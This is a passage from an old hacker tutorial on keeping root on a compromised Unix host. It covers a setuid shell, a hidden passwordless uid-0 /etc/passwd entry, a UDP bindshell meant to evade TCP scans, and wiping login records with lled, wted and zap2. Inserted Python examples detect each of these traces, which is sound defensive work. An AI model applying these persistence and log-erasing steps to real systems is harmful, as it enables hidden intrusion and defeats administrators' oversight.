root
We're superluser again!
There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
We'd then upload the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms either! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)
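Seen from the admin's side, the suid shell described above stands out in two ways: it is a regular file in a directory that should hold only device nodes, and it carries the setuid bit. The following Python audit is an added example, not part of the original text; the function names are made up for illustration, and the content comparison against /bin/sh only catches a straight copy, not a different shell such as sash.

```python
import hashlib
import os
import stat


def sha256_of(path):
    """Hash a file in chunks; return None if it cannot be read."""
    digest = hashlib.sha256()
    try:
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
    except OSError:
        return None
    return digest.hexdigest()


def reasons_for(mode, uid):
    """Explain why an entry with this st_mode/st_uid is out of place under /dev."""
    if not stat.S_ISREG(mode):
        return []  # device nodes, directories, symlinks and sockets are expected
    reasons = ["regular file where device nodes are expected"]
    if mode & stat.S_ISUID:
        owner = "root" if uid == 0 else "uid %d" % uid
        reasons.append("setuid bit set, runs as " + owner)
    return reasons


def audit_tree(root="/dev", shell_paths=("/bin/sh",)):
    """Walk root and return {path: [reasons]} for every suspicious entry."""
    shell_hashes = {sha256_of(p) for p in shell_paths} - {None}
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the entry itself, not a link target
            except OSError:
                continue
            reasons = reasons_for(st.st_mode, st.st_uid)
            if reasons and sha256_of(path) in shell_hashes:
                reasons.append("content identical to a system shell")
            if reasons:
                findings[path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in sorted(audit_tree().items()):
        print(path, "->", "; ".join(reasons))
```

On current Linux systems /dev/shm legitimately holds regular files, so expect those in the output and filter them before alerting.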
2. How to add fake lusers.
You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.
This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell
When uid=0 and gid=0, that luser gets superluser privileges.
Then we add a line like this:
dood::0:0:dood:/:/bin/sh (put it in a hidden place)
So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood
And now we're root because dood's uid=0 and gid=0.
Smart admins usually look for anomalies in /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
I haven't got such a program at my site, but it shouldn't be difficult to develop.
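The anomalies a careful admin looks for can be checked mechanically. This added example (not part of the original text) parses passwd-format text and reports an empty password field, uid 0 on an account other than root, and a uid shared between accounts. The sample file is constructed, the function name is hypothetical, and the seven-field layout used is the standard /etc/passwd one.

```python
# Constructed sample: three ordinary entries plus the line from the text above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
luser:x:1000:1000:luser:/home/luser:/bin/sh
dood::0:0:dood:/:/bin/sh
"""


def audit_passwd(text, allowed_uid0=("root",)):
    """Return (line_number, account, reason) tuples for suspicious entries."""
    findings = []
    first_owner = {}  # uid -> first account name seen with that uid
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        # Expected fields: name:passwd:uid:gid:comment:home:shell
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], int(fields[2])
        if password == "":
            findings.append((lineno, name, "empty password field"))
        if uid == 0 and name not in allowed_uid0:
            findings.append((lineno, name, "uid 0 on a non-root account"))
        if uid in first_owner:
            findings.append((lineno, name, "uid shared with " + first_owner[uid]))
        else:
            first_owner[uid] = name
    return findings


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print("line %d: %s: %s" % (lineno, name, reason))
```

Because every line is parsed, where in the file the entry sits makes no difference to the result.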
3. How to put a bindshell.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The difference is that this is our own daemon. The good bindshells will listen to a UDP port (not TCP)
and give a shell to you when you connect. The cool thing about UDP is this:
If the admin uses a scanner to see what TCP ports are open, he wouldn't find anything!
They rarely remember UDP exists.
You can get a UDP bindshell coded by !hispahack from my site.
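A TCP-only port scan misses such a listener, but the host itself knows every bound socket. This added example (not part of the original text) parses the Linux /proc/net/udp table and reports unconnected UDP sockets on ports outside an allowlist. The sample table, the allowlist and the function names are constructed for illustration, and it assumes a little-endian Linux host; other systems need a different source such as netstat output.

```python
import socket
import struct

# Constructed sample in /proc/net/udp format: DNS on 53, NTP on 123, and one
# unexplained socket on port 50000 owned by uid 0.
SAMPLE_PROC_NET_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
  101: 0100007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000   101        0 15034 2 0000000000000000 0
  187: 00000000:007B 00000000:0000 07 00000000:00000000 00:00000000 00000000   123        0 18220 2 0000000000000000 0
  442: 00000000:C350 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 90551 2 0000000000000000 0
"""


def decode_endpoint(field):
    """Turn '0100007F:0035' into ('127.0.0.1', 53)."""
    hex_ip, hex_port = field.split(":")
    # The kernel prints the IPv4 address as a host-order hex word (little-endian
    # on x86), so repacking it little-endian restores network byte order.
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def unexpected_udp_listeners(table_text, allowed_ports):
    """Return [(ip, port, uid, inode)] for unconnected sockets off the allowlist."""
    findings = []
    for line in table_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10:
            continue
        ip, port = decode_endpoint(fields[1])
        _remote_ip, remote_port = decode_endpoint(fields[2])
        # Remote port 0 means the socket is bound and waiting, not connected.
        if remote_port == 0 and port not in allowed_ports:
            findings.append((ip, port, int(fields[7]), int(fields[9])))
    return findings


if __name__ == "__main__":
    for hit in unexpected_udp_listeners(SAMPLE_PROC_NET_UDP, {53, 123}):
        print("unexpected UDP socket: %s:%d uid=%d inode=%d" % hit)
```

The inode in each finding can be matched against the socket links under /proc/<pid>/fd to identify the owning process.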
Cleaning up
~~~~~~~~~~~
Remember when we logged in to target.edu as luser, and used su to become root?
Take a look at this line:
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
Yes, that was displayed by the target box when we logged in there.
It refers to the last login that the real luser did.
So, what will be displayed when luser logs in again?
Last login: Sun Sep 24 10:32:14 from
Then luser writes a mail to the admin:
"Something strange has happened, when I logged in today, I read a line like this:
Last login: Sun Sep 24 10:32:14 from
Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."
The admin responds to luser:
"That wasn't a bug! This line means someone accessed the system using your password, don't
worry about that, we got his IP. That means we can ask his ISP what phone number called
at 10:32 and get
So you'll get busted because luser was a bit clever (sometimes happens).
So we gotta find a way to delete that.
This information can be stored in:
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
and we can erase it using lled (get it from my site)
lled has a built-in help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.
There is also some information we'd like to erase:
Remember when I told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its syntax is very similar to lled.
You can get it from my site.
The who command shows us (and the admin) which lusers are logged in at the moment.
What if we login and the admin is there?
sh-2.03$ who
root tty1 Sep 25 18:18
Then we shall use zap2. If you logged in as 'luser', then type:
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
And luser has never been here.
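Edits to the login records leave their own marks. This added example (not part of the original text) scans wtmp-format data for two of them: a record overwritten with zero bytes, and a timestamp that runs backwards in what should be an append-only log. It assumes the 384-byte Linux glibc record layout and that a blanked record is zero-filled, neither of which the text above states; the sample data and function names are constructed.

```python
import struct

# Assumed layout: Linux glibc struct utmp, 384 bytes per record:
# type, pid, line, id, user, host, exit (2 shorts), session, sec, usec, addr, pad
UTMP = struct.Struct("<hxxi32s4s32s256shhiii16s20s")
USER_PROCESS = 7


def make_record(user, line, host, tv_sec):
    """Build one constructed login record for the sample below."""
    return UTMP.pack(USER_PROCESS, 4242, line.encode(), b"", user.encode(),
                     host.encode(), 0, 0, 0, tv_sec, 0, b"", b"")


def scan_wtmp(data):
    """Return (record_index, reason) for records that look edited."""
    findings = []
    newest = 0
    whole = len(data) - len(data) % UTMP.size
    for offset in range(0, whole, UTMP.size):
        index = offset // UTMP.size
        record = data[offset:offset + UTMP.size]
        if not any(record):
            findings.append((index, "record is all zero bytes"))
            continue
        tv_sec = UTMP.unpack(record)[9]  # ninth unpacked value is the login time
        if tv_sec < newest:
            findings.append((index, "timestamp older than an earlier record"))
        newest = max(newest, tv_sec)
    if whole != len(data):
        findings.append((whole // UTMP.size, "truncated trailing record"))
    return findings


# Constructed sample of four records: the second is blanked in place and the
# last carries a time that predates the first.
SAMPLE_WTMP = (make_record("root", "tty1", "", 969905880)
               + bytes(UTMP.size)
               + make_record("luser", "pts/1", "host.example", 969906300)
               + make_record("luser", "pts/2", "host.example", 969800000))

if __name__ == "__main__":
    for index, reason in scan_wtmp(SAMPLE_WTMP):
        print("record %d: %s" % (index, reason))
```

A clock correction can also produce a backwards timestamp, so treat that finding as a lead to check against other logs rather than as proof.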
Greetings
~~~~~~~~~
Ok, this is all for now (I'll make a newer version). I hope it has been useful to you and you
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.
I'd be very happy if you send me a mail telling me your impression of this paper (whether
it is good or bad), and you help me to improve it.
I'd like to send my greetings to every hacker that has taught me in any way, through newsgroups
or other tutorials like this one. Thanks to all.